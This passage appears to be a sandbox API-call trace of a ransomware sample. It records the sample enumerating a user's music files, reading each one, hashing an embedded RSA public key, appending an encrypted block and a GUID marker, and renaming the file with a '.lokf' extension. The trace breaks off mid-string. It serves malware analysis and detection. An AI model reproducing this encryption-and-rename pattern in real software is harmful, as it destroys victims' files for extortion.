dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e2e8 | out: hHeap=0x660000) returned 1 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c860e8 [0060.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86100 [0060.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c860d0 [0060.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0060.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86118 [0060.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c860e8 | out: hHeap=0x660000) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c860e8 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x9c87710 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c860e8 | out: hHeap=0x660000) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32947b0 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b87a8 | out: hHeap=0x660000) returned 1 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87710 | out: hHeap=0x660000) returned 1 [0060.885] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86118 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86100 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c860d0 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c860b8 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86890 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.886] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.886] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8dae8*, nNumberOfBytesToWrite=0x13de3, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8dae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x13de3, lpOverlapped=0x0) returned 1 [0060.887] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8dae8 | out: hHeap=0x660000) returned 1 [0060.887] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13de8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.887] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.887] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.887] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.887] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0060.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.887] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0060.887] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.887] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.887] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.887] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0060.887] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.887] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.887] CloseHandle (hObject=0x5cc) returned 1 [0060.888] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290508 [0060.888] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.888] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290508 | out: hHeap=0x660000) returned 1 [0060.888] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\sKttn2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\jkvombm7vh9emud_ajp\\skttn2.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\sKttn2.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\jkvombm7vh9emud_ajp\\skttn2.m4a.lokf")) returned 1 [0060.889] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.889] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.889] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.890] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.890] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039b250, ftCreationTime.dwHighDateTime=0x1d4cb17, ftLastAccessTime.dwLowDateTime=0xffd51e80, ftLastAccessTime.dwHighDateTime=0x1d4cb7b, ftLastWriteTime.dwLowDateTime=0xffd51e80, ftLastWriteTime.dwHighDateTime=0x1d4cb7b, nFileSizeHigh=0x0, nFileSizeLow=0xc283, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="t_BQoltGh0ocw10QeS.wav", cAlternateFileName="T_BQOL~1.WAV")) returned 1 [0060.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.890] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.890] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\t_BQoltGh0ocw10QeS.wav") returned=".wav" [0060.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\t_BQoltGh0ocw10QeS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\jkvombm7vh9emud_ajp\\t_bqoltgh0ocw10qes.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.890] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=49795) returned 1 [0060.890] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.893] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc25d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.893] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.894] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.894] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xc283, lpOverlapped=0x0) returned 1 [0060.894] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.894] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.894] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.894] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.894] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.895] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.895] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.895] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.895] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.895] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.895] GetLastError () returned 0x0 [0060.895] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.895] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.895] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.895] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.895] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.895] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.895] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.895] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.896] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc283, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.896] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.896] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.896] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.896] CloseHandle (hObject=0x5cc) returned 1 [0060.897] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd0) returned 0x31e9450 [0060.897] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e0) returned 0x326aa18 [0060.897] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\t_BQoltGh0ocw10QeS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\jkvombm7vh9emud_ajp\\t_bqoltgh0ocw10qes.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\t_BQoltGh0ocw10QeS.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\jkvombm7vh9emud_ajp\\t_bqoltgh0ocw10qes.wav.lokf")) returned 1 [0060.898] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fd37b00, ftCreationTime.dwHighDateTime=0x1d4d0d8, ftLastAccessTime.dwLowDateTime=0xbd1c9840, ftLastAccessTime.dwHighDateTime=0x1d4d100, ftLastWriteTime.dwLowDateTime=0xbd1c9840, ftLastWriteTime.dwHighDateTime=0x1d4d100, nFileSizeHigh=0x0, nFileSizeLow=0x2420, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WsOPu73F.wav", cAlternateFileName="")) returned 1 [0060.898] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.899] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.899] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\WsOPu73F.wav") returned=".wav" [0060.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\WsOPu73F.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\jkvombm7vh9emud_ajp\\wsopu73f.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.899] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=9248) returned 1 [0060.899] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.901] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x23fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.901] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.902] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x2420, lpOverlapped=0x0) returned 1 [0060.902] lstrlenA (lpString="-----BEGIN PUBLIC 